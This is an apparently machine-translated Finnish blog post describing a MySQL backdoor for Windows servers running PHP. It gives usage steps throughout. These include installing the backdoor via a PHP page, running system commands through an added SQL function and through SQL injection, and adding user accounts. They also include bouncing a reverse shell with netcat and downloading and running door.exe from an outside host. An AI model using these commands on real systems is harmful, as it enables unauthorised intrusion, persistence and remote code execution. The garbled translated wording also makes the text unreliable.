Mysql takaoven
Lähde: Puri Manchester
Mysql backdoor oli takaoven kehittämiseen PHP + MySQL-palvelimen MySQL jälkeen takaoven asentaa lisää "tilaa"-toiminnon voi suorittaa järjestelmässä komentoja ja aloita Mysql joka perustuu dll narkomaani tyyppi takaoven, taitavasti toteutettu no portti, ei prosessi ole palveluja seinän läpi Troijan. ohjelma WINXP WIN2003 + MYSQL5.0.X, ja alle pass.
Asennus Mysql.php leviää PHP palvelimen mukaan täyttää Host-user-password-DB, klikkaa "auto-asentaa MySQL takaoven"
Onnistuneen asennuksen jälkeen Mysql lisäisi "valtio"-toiminto, mutta Mysql prosessi on käynnissä haistaa takaoven tämän takaoven Windows on sama järjestelmäoikeudet ja Mysql.
Käyttö valtion toimintojen
Valtion tehtävä on oikeastaan PHP järjestelmä () "-toiminto sama toiminto voidaan suorittaa järjestelmässä komentoja. Anna SQL-komento:" Toimisto ja täytä mysql ilmoitus voitaisiin panna täytäntöön, kuten "valitse tila (" net user nohack / add "), valitse" Suorita SQL ajaa tuloksia.
Kun valtio toiminnon perusteella Nipsu takaoven, vaikka WebShell kadonnut, niin kauan kuin palvelin, SQL-injektio vaiheessa voimme injektiolla. Php? Id = 1 ja valtion ("net user '),' menetelmä suorittaa palvelimella komento. Jos injektio kohta ei ole sitä? vieläkään kutsumme Nipsu takaoven Control Server. lähetetään jokaiseen satamaan palvelimen ja avoin Mysql-"paketin alkuun, voi soittaa Nipsu takaoven, kuten:
Käytössä järjestelmä komento: nc ip 80 -> Enter -> Mysql-cmd / c net user abc / add> c :/ log.txt, (Huom: viimeinen "!" Ei voi jättää pois)
2 20082 sataman kuori paikalliseen palvelimeen bounce: ensiesitykset nc-lp 20 082 seurata koneen 20082 porttiin, ja sitten nc ip 80 -> Enter -> Mysql-c -> Anna
Anna palvelimelle lataus: nc ip 80 -> Enter -> Mysql-http :/ / www.x.com / door.exe-c mydoor.exe (Huom: viimeinen! "Ei voi jättää pois)
Sen lisäksi, että lähettämällä "Mysql-C-", muut komento ei kaiun, mutta vastaavat komennot palvelin käynnissä.
Poista MySQL run "drop-toiminto tilassa" voidaan purkaa, mutta samalla aiheuttaa mysql prosessin poistua, palata normaaliin uudelleenkäynnistyksen jälkeen.










































156 Trackback (t)
Sinun täytyy olla kirjautuneena kommentoidaksesi.